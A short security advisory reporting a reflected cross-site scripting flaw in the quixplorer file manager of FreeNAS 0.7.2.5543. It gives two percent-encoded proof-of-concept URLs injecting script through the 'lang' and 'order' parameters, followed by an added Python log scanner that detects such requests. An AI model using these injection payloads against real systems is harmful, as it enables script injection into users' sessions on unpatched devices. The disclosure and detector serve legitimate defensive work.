FreeNAS 0.7.2.5543 Cross Site Scripting

2010-12-20T00:00:00
ID PACKETSTORM:96827
Type packetstorm
Reporter dave b
Modified 2010-12-20T00:00:00

Description

Good morning, you can XSS FreeNAS stable (0.7.2.5543) like this:

http://192.168.0.1/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

or this ...

http://192.168.0.1/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes

etc.

This works regardless of whether the user is logged into the quixplorer module or FreeNAS.

--
question = ( to ) ? be : ! be; -- Wm. Shakespeare
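A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web access log lines for quixplorer requests whose `lang`, `order`, `srt` or `action` values are anything other than a short identifier. The access log layout (common log format), the allowlist pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate values of these parameters are short identifiers
# such as "en", "name", "yes" or "list".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,32}")
WATCHED_PARAMS = ("action", "order", "srt", "lang")
# Assumption: request line as written in common/combined log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return {param: decoded value} for watched params that fail the allowlist."""
    parts = urlsplit(url)
    if not parts.path.endswith("/quixplorer/index.php"):
        return {}
    hits = {}
    # parse_qsl percent-decodes, so %22 / %3C / %3E are compared as " < >.
    for name, value in parse_qsl(parts.query):
        if name in WATCHED_PARAMS and not SAFE_VALUE.fullmatch(value):
            hits[name] = value
    return hits


def scan_log(lines):
    """Return [(client_ip, hits)] for every log line with a suspicious request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings


# Constructed sample lines; the two flagged URLs are the ones from the advisory.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Dec/2010:09:15:02 +0000] "GET /quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Dec/2010:09:16:40 +0000] "GET /quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes HTTP/1.1" 200 5098',
    '192.0.2.15 - - [20/Dec/2010:09:17:11 +0000] "GET /quixplorer/index.php?action=list&order=name&srt=yes&lang=en HTTP/1.1" 200 4876',
]

if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE_LOG):
        print(client, hits)
```

Because the advisory states the issue is reachable without a login, the check does not look at session or authentication fields; the same allowlist can serve as server-side input validation in front of output encoding.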